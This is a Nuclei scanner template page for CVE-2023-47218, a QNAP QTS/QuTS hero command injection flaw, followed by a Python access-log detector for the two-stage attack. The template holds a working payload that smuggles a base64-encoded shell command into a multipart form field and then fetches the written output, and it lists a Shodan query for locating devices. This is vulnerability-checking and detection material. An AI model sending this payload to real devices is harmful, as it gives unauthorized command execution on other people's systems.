QNAP QTS and QuTS Hero - OS Command Injection
ID: CVE-2023-47218
Severity: medium
Author: ritikchaddha
Tags: cve,cve2023,qnap,qts,quts,rce,intrusive
Description
An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later; QuTS hero h5.1.5.2647 build 20240118 and later; QuTScloud c5.1.5.2651 and later.
YAML Source
id: CVE-2023-47218

info:
  name: QNAP QTS and QuTS Hero - OS Command Injection
  author: ritikchaddha
  severity: medium
  description: |
    An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later; QuTS hero h5.1.5.2647 build 20240118 and later; QuTScloud c5.1.5.2651 and later.
  reference:
    - https://github.com/passwa11/CVE-2023-47218
    - https://twitter.com/win3zz/status/1760224052289888668/photo/3
    - https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47218
    - https://www.qnap.com/en/security-advisory/qsa-23-57
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 5.8
    cve-id: CVE-2023-47218
    cwe-id: CWE-77
    epss-score: 0.00305
    epss-percentile: 0.69699
    cpe: cpe:2.3:o:qnap:qts:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS"
    product: qts
    vendor: qnap
  tags: cve,cve2023,qnap,qts,quts,rce,intrusive

variables:
  file: '{{rand_base(6)}}'
  cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22'

http:
  - raw:
      - |
        POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary="avssqwfz"

        --avssqwfz
        Content-Disposition: form-data; xxpcscma="field2"; zczqildp="{{cmd}}"
        Content-Type: text/plain

        skfqduny
        --avssqwfz--

      - |
        POST /cgi-bin/quick/{{file}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_1, "code\": 200", "full_path_filename success")'
          - 'contains_all(body_2, "uid=", "gid=")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100ee6f2926f68873ab0857fa464fe7333b1c523c8b451961638797d097ea5e5e3a022100c6861c25689276ca1020e51ce64e2df6139a4e6551b25f4d161ccedd1e012b58:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the vulnerability in a target web application. Run it with the Nuclei tool, which sends the requests above and reports a match only when both responses satisfy the matchers:
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-47218.yaml"
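The template above makes two requests: a multipart POST to the quick.cgi firmware-upload handler, then a POST for the file it wrote under /cgi-bin/quick/. As an added example (not part of the template or of the Nuclei project), the Python below scans web-server access-log lines for that two-stage pattern so a defender can spot scans or exploitation attempts against a NAS; the log lines are constructed samples, the combined-log format is an assumption, and the stage-2 path is assumed to be the six alphanumeric characters that rand_base(6) produces.

```python
import re

# Constructed sample access-log lines (Apache "combined" style, assumed); not from a real device.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Feb/2024:10:01:02 +0000] "GET /cgi-bin/login.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Feb/2024:10:01:05 +0000] "POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1" 200 88 "-" "curl/8.4.0"
10.0.0.9 - - [20/Feb/2024:10:01:06 +0000] "POST /cgi-bin/quick/kdjs8a HTTP/1.1" 200 40 "-" "curl/8.4.0"
10.0.0.7 - - [20/Feb/2024:10:02:00 +0000] "GET /cgi-bin/quick/abcdef HTTP/1.1" 404 200 "-" "Mozilla/5.0"
10.0.0.7 - - [20/Feb/2024:10:02:10 +0000] "GET /cgi-bin/quick/quick.cgi?func=sysinfo HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, method, request path (with query string) and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Stage 1: the quick.cgi handler targeted by the template's first request
# (the "uploaf" spelling is the parameter value as used by the template, so match it literally).
STAGE1_RE = re.compile(
    r'^/cgi-bin/quick/quick\.cgi\?(?=.*\bfunc=switch_os\b)(?=.*\btodo=uploaf_firmware_image\b)', re.I
)
# Stage 2: the template's second request fetches /cgi-bin/quick/{{file}}, a rand_base(6) name
# (assumed alphanumeric here).
STAGE2_RE = re.compile(r'^/cgi-bin/quick/[A-Za-z0-9]{6}$')


def parse_line(line):
    """Return a dict with ip/method/path/status, or None if the line is not combined-log shaped."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_cve_2023_47218(log_text):
    """Return (ip, stage) alerts. Stage 2 is only raised for an IP that already hit stage 1,
    so an ordinary request for a short path under /cgi-bin/quick/ does not alert on its own."""
    alerts = []
    hit_stage1 = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and STAGE1_RE.match(rec["path"]):
            hit_stage1.add(rec["ip"])
            alerts.append((rec["ip"], "stage1_firmware_upload_handler"))
        elif rec["ip"] in hit_stage1 and STAGE2_RE.match(rec["path"]):
            # A 200 here mirrors the template's success matcher: the dropped file was served.
            stage = "stage2_dropped_file_served" if rec["status"] == "200" else "stage2_dropped_file_probe"
            alerts.append((rec["ip"], stage))
    return alerts


if __name__ == "__main__":
    for ip, stage in detect_cve_2023_47218(SAMPLE_LOG):
        print(f"ALERT {ip}: {stage}")
```

A stage-1 hit alone is worth triaging on an unpatched device, since the template's matcher only needs the upload response to report success before the second request confirms execution.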